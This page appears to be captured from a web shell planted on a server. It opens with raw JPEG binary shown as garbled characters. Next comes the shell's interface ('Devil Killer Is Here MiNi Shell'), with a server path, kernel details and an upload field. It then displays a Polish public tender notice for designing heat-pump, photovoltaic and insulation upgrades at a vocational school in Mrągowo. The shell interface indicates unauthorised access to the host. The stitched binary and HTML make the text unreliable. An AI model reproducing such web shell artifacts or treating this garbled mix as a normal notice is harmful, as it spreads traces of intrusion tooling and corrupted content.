JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250224/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250224/0011807901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowej oraz specyfikacji technicznych wykonania i odbioru robót budowlanych dla zadania pn.: „Wymiana źródeł ciepła i poprawa efektywności energetycznej CKZiU w Mrągowie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Mrągowski</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Starostwo Powiatowe w Mrągowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510750373</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Królewiecka 60A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mrągowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">starostwo@powiat.mragowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiat.mragowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowej oraz specyfikacji technicznych wykonania i odbioru robót budowlanych dla zadania pn.: „Wymiana źródeł ciepła i poprawa efektywności energetycznej CKZiU w Mrągowie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-362499be-a1a1-4463-933b-1ad8bd09e20f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00118079</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00036922/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Wykonanie dokumentacji projektowej oraz specyfikacji technicznych wykonania i odbioru robót budowlanych dla zadania pn.: „Wymiana źródeł ciepła i poprawa efektywności energetycznej CKZiU w Mrągowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-362499be-a1a1-4463-933b-1ad8bd09e20f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>zostały szczegółowo opisane w SWZ przedmiotowego postępowania oraz Regulaminie Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1. Administratorem Państwa danych jest Powiat Mrągowski reprezentowany przez Starostę Mrągowskiego, którego siedziba mieści<br/>się w Starostwie Powiatowym w Mrągowie, ul. Królewiecka 60A, 11-700 Mrągowo, e-mail: starostwo@powiat.mragowo.pl, tel. 89<br/>7410150<br/>2. Osobą udzielającą wyjaśnień w zakresie ochrony danych osobowych jest Inspektor Ochrony Danych, z którym można kontaktować się pod adresem e-mail: iod@powiat.mragowo.pl<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami ustawy pzp.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ust. 4 ustawy pzp.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy pzp.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do<br/>organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/>dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą pzp.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.<br/>14. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust.<br/>1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu,<br/>Administrator nie udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 Rozporządzenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.272.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie dokumentacji projektowej oraz specyfikacji technicznych wykonania i odbioru robót budowlanych dla zadania pn.: „Wymiana źródeł ciepła i poprawa efektywności energetycznej Centrum Kształcenia Zawodowego i Ustawicznego w Mrągowie”, z podziałem na etapy.<br/><br/>I. Podstawowe dane o obiektach objętych opracowaniem dokumentacji:<br/>Dokumentacja będzie opracowana na potrzeby trzech budynków termomodernizacji budynków Centrum Kształcenia Zawodowego i Ustawicznego w Mrągowie przy <br/>ul. Mrongowiusza 65, zlokalizowanych na terenie nieruchomości oznaczonej w ewidencji gruntów i budynków jako działka o numerze ewidencyjnym 85/3 w obrębie 4 w Mrągowie, z podziałem na etapy:<br/><br/>1)	ETAP I - Kompleks budynku szkoły wraz z częścią gastronomiczną (opisane <br/>w audycie energetycznym również jako: części budynków &#34;Budynek gastronomii&#34; oraz &#34;Budynek szkoły&#34;);<br/>2)	ETAP II - Budynek warsztatów. <br/><br/>Opracowana dokumentacja ma umożliwić realizację robot budowlanych z podziałem <br/>na etapy, przy założeniu, że każdy z etapów może być realizowany niezależnie od drugiego. <br/><br/>1.	Podstawowe dane techniczne:<br/>1)	Kompleks budynku szkoły wraz z budynkiem gastronomii (opisane w audycie energetycznym również jako: części budynków „Budynek gastronomii” oraz „Budynek szkoły”):<br/>a)	Budynek szkoły:<br/>	liczba kondygnacji – 4,<br/>	kubatura części ogrzewanej – 9760,36 m³,<br/>	powierzchnia użytkowa budynku – 3157,41 m²,<br/>	powierzchnia zabudowy – 1403,56 m²,<br/>b)	Budynek gastronomii:<br/>	liczba kondygnacji – 4,<br/>	kubatura części ogrzewanej – 4327,92 m³,<br/>	powierzchnia użytkowa budynku – 1137,18 m²,<br/>2)	Budynek warsztatów:<br/>	liczba kondygnacji – 2,<br/>	kubatura części ogrzewanej – 5293,66 m³,<br/>	powierzchnia użytkowa budynku – 1497,02 m². <br/><br/>II. Zakres rzeczowy przedmiotu zamówienia:<br/>Wykonanie dokumentacji dla potrzeb termomodernizacji budynków Centrum Kształcenia Zawodowego i Ustawicznego w Mrągowie związanej z polepszeniem ich efektywności energetycznej, w stopniu umożliwiającym uzyskanie wszystkich wymaganych prawem decyzji i uzgodnień zezwalających na wykonanie robót budowlanych. <br/><br/>1.	Wykonawca zapewni mapę do celów projektowych – jeżeli dotyczy.<br/>2.	Wykonanie inwentaryzacji budynków w zakresie niezbędnym do opracowania dokumentacji – szt. 2.<br/>3.	Opracowanie dokumentacji projektowej na podstawie załączonych audytów energetycznych opracowanych przez Pana Kamila Cygarowskiego, reprezentującego firmę Warmińska Energia, na którą składać się będą m.in.:<br/>a)	Projekt architektoniczno-budowlany – szt. 4,<br/>b)	Projekt wykonawczy – szt. 4,<br/>c)	Projekty branżowe – szt. 4 (oddzielne opracowania),<br/>d)	STWiOR – szt. 2,<br/>e)	Przedmiary i kosztorysy inwestorskie wszystkich branż – szt. 1,<br/>f)	Wersja elektroniczna dokumentacji na pycie CD (część tekstowa opracowania <br/>w formacie *.doc [MS Word] lub *.pdf [Adobe Reader], część rysunkowa w formacie *.dwg lub *.dxf oraz w *.pdf [Adobe Reader]; kosztorys i przedmiar robót w formacie *.ath [Norma lub inny kompatybilny] lub *.xls [MS Excel]) – szt. 1.<br/>4.	W dokumentacji należy uwzględnić wytyczne z audytów energetycznych, opracowanych dla poszczególnych budynków, w szczególności należy przewidzieć:<br/>1)	system BMS budynku integrujący zarządzanie energią cieplną (c.o.) i ciepłą wodą użytkową (c.w.u.) z instalacjami fotowoltaicznymi (PV), wiatrowymi, magazynem energii, pompą ciepła, magazynem energii cieplnej oraz magazynem c.w.u. System umożliwiający precyzyjne zarządzanie energią cieplną na poziomie poszczególnych pomieszczeń oraz stref budynku,<br/>2)	instalację PV o mocy 80 kWe (+40 kWe warsztaty) oraz turbiny wiatrowe <br/>o pionowej osi obrotu o łącznej mocy 20 kWe (+10 kWe warsztaty) posiadające zgodność z normami CE i IEC 61400,<br/>3)	instalację gruntowej pompy ciepła o podwyższonej klasie efektywności energetycznej o mocy ok. 230 kW (+65 kW warsztaty) wraz z buforem ciepła <br/>o pojemności warunkującej maksymalną auto konsumpcję energii elektrycznej <br/>z instalacji PV/wiatrowej, z modernizacją pomieszczeń kotłowni i montażem stacji uzdatniania wody instalacji c.o.,<br/>4)	bateryjny magazyn energii (LiFePO4) o pojemności ok. 100 kWh (+50 kWh warsztaty),<br/>5)	dla poszczególnych budynków/części kompleksu Centrum Kształcenia Zawodowego i Ustawicznego należy indywidualnie przewidzieć następujące zamierzenia:<br/>a)	budynek szkoły:<br/>	modernizacja przegród zewnętrznych – docieplenie ścian zewnętrznych z płyt styropianowych frezowanych, ok. 997 m²,<br/>	modernizacja dachu – termomodernizacja dachu wraz z wymianą pokrycia, orynnowania i obróbek blacharskich dachu, ok. 1 423,4 m²,<br/>	modernizacja stolarki okiennej i drzwiowej – planuje się wymianę ok. 7,5 m² okien oraz wymianę drzwi metalowych garażu (bramy garażowe segmentowe z napędem) i pomieszczenia gospodarczego oraz drzwi drewnianych, ok. 38,9 m²,<br/>	wymiana oświetlenia:<br/>Planuje się montaż nowoczesnej instalacji oświetlenia opartej na rozwiązaniach LED, spełniającą normy oświetlenia w budynkach oświatowych,<br/>	modernizacja instalacji ciepłej wody użytkowej:<br/>Planuje się modernizację instalacji c.w.u. wraz z pojemnościowym podgrzewaczem wody zintegrowanym z pompą ciepła i systemem zarządzania energią EMS, polegającą na montażu nowych komponentów instalacji c.w.u. wraz z nowym zasobnikiem c.w.u. wraz z zastosowaniem nowoczesnego pojemnościowego zasobnika ciepłej wody użytkowej o dużej pojemności zintegrowanego z BMS budynku pozwalając na maksymalną auto konsumpcję energii elektrycznej, <br/>	modernizacja instalacji grzewczej:<br/>Planuje się wymianę źródła ciepła na gruntową pompę ciepła wraz z zasobnikiem ciepła zintegrowanych z BMS pozwalającym na maksymalną auto konsumpcję energii z instalacji pv/wiatrowej. Ponadto, planuje się montaż nowych komponentów instalacji CO w tym grzejników z głowicami termostatycznymi oraz wymianę pionów,<br/>	montaż systemu wentylacji nawiewno-wywiewnej z odzyskiem ciepła zintegrowanego z systemem zarządzania energią budynku BMS,<br/>	montaż zewnętrznego złącza instalacji elektrycznej, które umożliwi bezpieczne podłączenie agregatu prądotwórczego, będzie współpracować z systemem BMS, instalacją PV/wiatrową oraz magazynem energii, zapewniając ciągłość zasilania budynku,<br/>b)	budynek gastronomii:<br/>	wymiana oświetlenia – planuje się montaż nowoczesnej instalacji oświetlenia opartej na rozwiązaniach LED, spełniającą normy oświetlenia w budynkach oświatowych,<br/>	modernizacja instalacji ciepłej wody użytkowej – planuje się montaż nowych komponentów instalacji składających się z pomp cyrkulacyjnych z ograniczeniem czasu pracy, montaż zasobnika c.w.u. zintegrowanego z BMS budynku pozwalającego na maksymalną auto konsumpcję energii,<br/>	modernizacja instalacji grzewczej – modernizacja całej instalacji c.o. polegająca na montażu regulacji miejscowej i strefowej z ograniczeniem czasu pracy, zintegrowanej z BMS budynku, wykonanie równoważenia hydraulicznego instalacji grzewczej, stacja uzdatniania,<br/>	montaż zewnętrznego złącza instalacji elektrycznej, które umożliwi bezpieczne podłączenie agregatu prądotwórczego, będzie współpracować z systemem BMS, instalacją PV/wiatrową oraz magazynem energii, zapewniając ciągłość zasilania budynku,<br/>c)	budynek warsztatów: <br/>	wymiana oświetlenia – modernizacja instalacji oświetlenia polegająca na wymianie sposobu regulacji włączania/wyłączania z ręcznego na automatyczny,<br/>	modernizacja instalacji ciepłej wody użytkowej – montaż nowych komponentów instalacji c.w.u. składających się z pomp cyrkulacyjnych z ograniczeniem czasu pracy, zasobnika c.w.u. zintegrowanego z BMS budynku pozwalającego na maksymalną auto konsumpcję energii,<br/>	modernizacja instalacji grzewczej – modernizacja całej instalacji c.o. polegająca na montażu regulacji miejscowej i strefowej z ograniczeniem czasu pracy zintegrowanej z BMS budynku, wykonanie równoważenia hydraulicznego instalacji grzewczej, stacji uzdatniania,<br/>	montaż zewnętrznego złącza instalacji elektrycznej, które umożliwi bezpieczne podłączenie agregatu prądotwórczego, będzie współpracować z systemem BMS, instalacją PV/wiatrową oraz magazynem energii, zapewniając ciągłość zasilania budynku.<br/>5.	Przedmiot zamówienia należy opracować w zakresie niezbędnym do przeprowadzenia postępowania przetargowego na wybór wykonawcy robót budowlanych w oparciu <br/>o ustawę Pzp oraz w zakresie niezbędnym do realizacji inwestycji, z podziałem na etapy.<br/>6.	Założenia projektowe muszą uzyskać akceptację Zamawiającego.<br/>7.	Oznaczenie przedmiotu zamówienia według klasyfikacji Wspólnego Słownika Zamówień:<br/>(CPV): 71320000-7 usługi inżynieryjne w zakresie projektowania, <br/>71220000-6 – usługi projektowania architektonicznego.<br/>8.	Zamawiający nie dopuszcza możliwości składania ofert częściowych.<br/>9.	Każdy Wykonawca może złożyć tylko jedną ofertę w postępowaniu.<br/>10.	Zamówienie będzie realizowane w ramach zadania inwestycyjnego pn. Wymiana źródeł ciepła i poprawa efektywności energetycznej Centrum Kształcenia Zawodowego <br/>i Ustawicznego w Mrągowie.<br/>11.	Dokumentację należy opracować w zakresie pełnej (kompletnej) dokumentacji projektowo-kosztorysowej oraz należy uzyskać w szczególności: prawomocne pozwolenie na budowę / zgłoszenie (o ile wymagane) (z podziałem na etapy) oraz inne niezbędne wymagane prawem pozwolenia i uzgodnienia.<br/>12.	Na podstawie opracowanej dokumentacji zostaną wykonane roboty budowlane.<br/>13.	W celu prawidłowej realizacji niniejszego zamówienia Wykonawca ma obowiązek zapewnić udział osób, które posiadają uprawnienia budowlane do projektowania <br/>w specjalnościach wynikających z przedmiotu zamówienia.<br/>14.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>15.	Zamawiający nie przewiduje udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp.<br/><br/>UWAGA! Ze względu na ograniczoną ilość znaków, pełny opis w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) Cena oferty brutto (C) – waga kryterium 60%<br/>2) Termin płatności faktury (T) – waga kryterium 40%<br/><br/>UWAGA! Ze względu na ograniczoną ilość znaków, pełny opis w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia 